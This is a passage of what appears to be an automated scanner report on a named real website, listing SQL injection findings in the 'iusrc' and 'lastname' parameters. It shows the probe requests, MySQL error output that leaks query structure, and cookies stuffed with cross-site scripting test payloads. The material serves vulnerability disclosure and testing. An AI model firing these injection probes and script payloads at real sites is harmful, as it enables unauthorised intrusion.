GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:00:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2pvtqt0eg97gjrnq197vrlep96; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.297. http://www.insideup.com/ppc/leadflow/fist00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:05:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6edb2o3uc0ha4adr4ds31dd6m6; path=/
Content-Length: 2222
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc'/'
   union select prj.catId,p' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc'' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:05:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=s4l29oulv4ta1vu0th6fon6b13; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.298. http://www.insideup.com/ppc/leadflow/fist00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:01:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=994e8c7d15alnciea466695650; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
